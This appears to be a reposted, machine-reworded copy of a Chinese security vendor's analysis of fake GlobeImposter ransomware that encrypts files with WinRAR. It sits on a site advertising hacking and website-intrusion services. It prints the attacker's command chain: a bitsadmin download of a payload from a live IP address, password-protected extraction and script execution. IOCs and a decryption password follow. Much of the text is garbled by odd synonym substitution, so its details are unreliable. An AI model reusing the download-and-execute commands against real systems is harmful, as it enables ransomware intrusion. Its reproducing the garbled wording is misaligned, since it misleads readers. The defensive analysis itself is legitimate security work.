黑客业务

黑客服务,入侵网站,网站入侵,黑客技术,信息安全,web安全

本杰明黑客,攻击者使用WinRAR加密压缩冒充GlobeImposter勒索病毒,腾讯平安专家轻松解密

       

2019上半年勒索病毒专题报告

腾讯平安御见威胁情报中心发现冒充GlobeImposter勒索病毒正在传播,攻击者怀疑通过MSSQL爆破入侵流传,恶意剧本代码通过网络下载完成用户数据加密和勒索流程。这种勒索病毒的执行非常简单,只是行使WinRAR加密压缩用户文件,之后再用一封修悔改的GlobeImposter勒索邮件新闻吓唬用户,通过邮箱联系要求报酬。            

   克日,腾讯平安御视威胁情报中心发现冒充GlobeImposter勒索病毒正在传播,攻击者怀疑通过MSSQL爆破入侵流传,恶意剧本代码通过网络下载完成用户数据加密和勒索流程。令人惊讶的是,这种勒索病毒的执行非常简单,只是行使WinRAR加密压缩用户文件,然后修改悔改GlobeImposter勒索新闻吓唬用户,并通过电子邮件联系他们获得报酬。腾讯安全提醒大家,如果你遇到这种病毒,不要急于支付赎金。病毒加密压缩密码明确写在病毒设置信息中,使用该密码解压缩,文件恢复。    

   

       

   

   剖析    

   

   涉嫌通过勒索服务器MSSQL爆破入侵乐成后,执行下列相关命令,进一步下载执行恶意代码:    

   

   1)bitsadmin /transfer n http://47.92.55.239/s/jr26.rar C:/Progra~1/jr26.rar    

   

   2)C:\Windows\system32\cmd.exe /c C:\Progra~1\winrar\rar.exe e -pp.5p C:\Progra~1\jr26.rar    

   

   3)C:\Windows\system32\cmd.exe /c C:\Progra~1\jr26.cmd    

   

   jr26.rar密码是带密码的压缩包p.5p    

   

   
   

   

       

   

   jr26.rar解压后,获得疑似乱码的剧本文件    

       
   

   
   

   

       

   

   16进行了检查,发现好像多了。0xFF 0xFE 0x0D 0x0A,目测应以二进制的形式写入标志,导致文本识别工具无法查看    

       
   

   
   

   

       

   

   去掉0xFF 0xFE 0x0D 0x0A实验再次打开后,可以正常查看剧本内容    

   

       

   

   
   

   

   查看剧本内容可知,主要目的为将指定类型的文件凭据后缀分类,划分使用winrar通过上图的命令行参数,我们可以看到加密密码是lll.hc3t6b9s8kz5r26),将文件压缩到根目录下相应的差异文件名(邮箱.ch_文件后缀类型.随机数字tiger88818)同时删除原始文件。    

   

       

   

   
   

   

   如下图Decryptcn@protonmail.ch_bax.32419tiger88818所有的包都被密码压缩了bak类型的文件    

   

       

   

   
   

   

   同时,为了防止数据库文件被占用,导致加密中止,病毒将完成大量数据库服务相关流程。    

   

       

   

   
   

   

   最精彩的来了。加密文件完成后,病毒将远程下载勒索说明文件    

   

       

   

   
   

   

   打开解释文件,原来是勒索病毒的名字GlobeImposter病毒作者只修改了联系邮箱。    

   

       

   

   
   

赛可达横评测试:腾讯电脑管家99.96%检测率获得第一名

   

   进一步调查病毒使用情况url可以找到攻击者使用的多个文件,并有勒索描述文件(HOW_TO_BACK_YOUR_FILE*),勒索剧本包(jr26.rar),正规的winrar压缩模块(Rar.exe),与扫描仪相关的模块包预测(带未知密码的s.rar),而病毒使用服务部署在名云平台服务器上。    

   

       

   

   
   

   

       

   

   
   

   

   腾讯平安提醒大家,对于这种病毒,不用急着交赎金,可以实验使用Winrar打开根目录*tiger88818后缀文件,然后选择使用密码(lll.hc3t6b9s8kz5r26)文件可以通过解压到指定位置来恢复。    

   

       

   

       

   

   
   

   

       

   

   
   

   

   平安建议    

   

   企业用户:    

   

   1.关闭不必要的端口,如:445135139等,对33895900等待端口可以设置白名单,只允许白名单IP毗邻上岸。    

   

   2.关闭不必要的文件共享。如有必要,请使用ACL与强密码珍爱限制接见权,禁止匿名接见共享文件夹。    

   

   3、接受高强度密码,停止使用弱密码,并定期更换密码。建议服务器密码使用高强度和不规则的密码,并强制每个服务器使用不同的密码处理。    

   

   4.服务器没有互联网需求/工作站内部接收设置响应控制,防止可连接外网服务器作为跳板进一步攻击其他服务器。

   

   5定期非内陆备份重要文件和数据(数据库等数据)。    

   

   6.教育终端用户应郑重下载不熟悉的电子邮件附件。如有必要,应限制使用Office宏代码。    

   

   7、在终端/服务器部署专业的安全防护软件,Web服务器可以考虑部署在腾讯云等具有专业安全防护能力的云服务中。    

   

   8.建议在全网安装皇家终端安全管理系统(https://s.tencent.com/product/yd/index.html)。皇家终端安全管理系统具有终端杀毒统一控制、修复缺陷统一控制、战略控制等综合安全管理效果,可以帮助企业管理者全面了解、管理企业内部网络安全状态,珍惜企业安全。

   

       

   

       

   

   个人用户:    

   

   1.启用腾讯电脑管家,不要随意打开陌生邮件,关闭Office执行宏代码    

   

   2.打开计算机管家的文档守护功能,行使磁盘冗余空间自动备份数据文档。即使发生事故,数据也可以准备好。    

   

       

   

   IOCs    

   

   MD5:

   

   36e826b4a06dcbf039fb8fd6aeca4836

   

   e9613db5620dbcb56903b98532971582

   

   f18b3b2dc6556d60663d70ac411c0ac8

   

   URL:
   hxxp://47.92.55.239/s/HOW_TO_BACK_YOUR_FILES.txt
   hxxp://47.92.55.239/s/HOW_TO_BACK_YOUR_FILESxx.rar
   hxxp://47.92.55.239/s/jr26.rar
   hxxp://47.92.55.239/s/Rar.exe
   hxxp://47.92.55.239/s/s.rar

   

       

支付价值900美元的比特币,否则隐私将公开!腾讯安全提醒小心欺诈勒索邮件

   
  • 评论列表:
  •  鸠骨鸢栀
     发布于 2022-05-29 09:01:56  回复该评论
  •                        个人用户:            1.启用腾讯电脑管家,不要随意打开陌生邮件,关闭Office执行宏代码            2.打开计算机管家的文档守护功能,行使磁盘冗余空间
  •  拥嬉木落
     发布于 2022-05-29 12:26:26  回复该评论
  • 88818)同时删除原始文件。                                    如下图Decryptcn@protonmail.ch_bax.32419tiger88818所有的包都被密码压缩了bak类型的文件                  

发表评论:

Powered By

Copyright Your WebSite.Some Rights Reserved.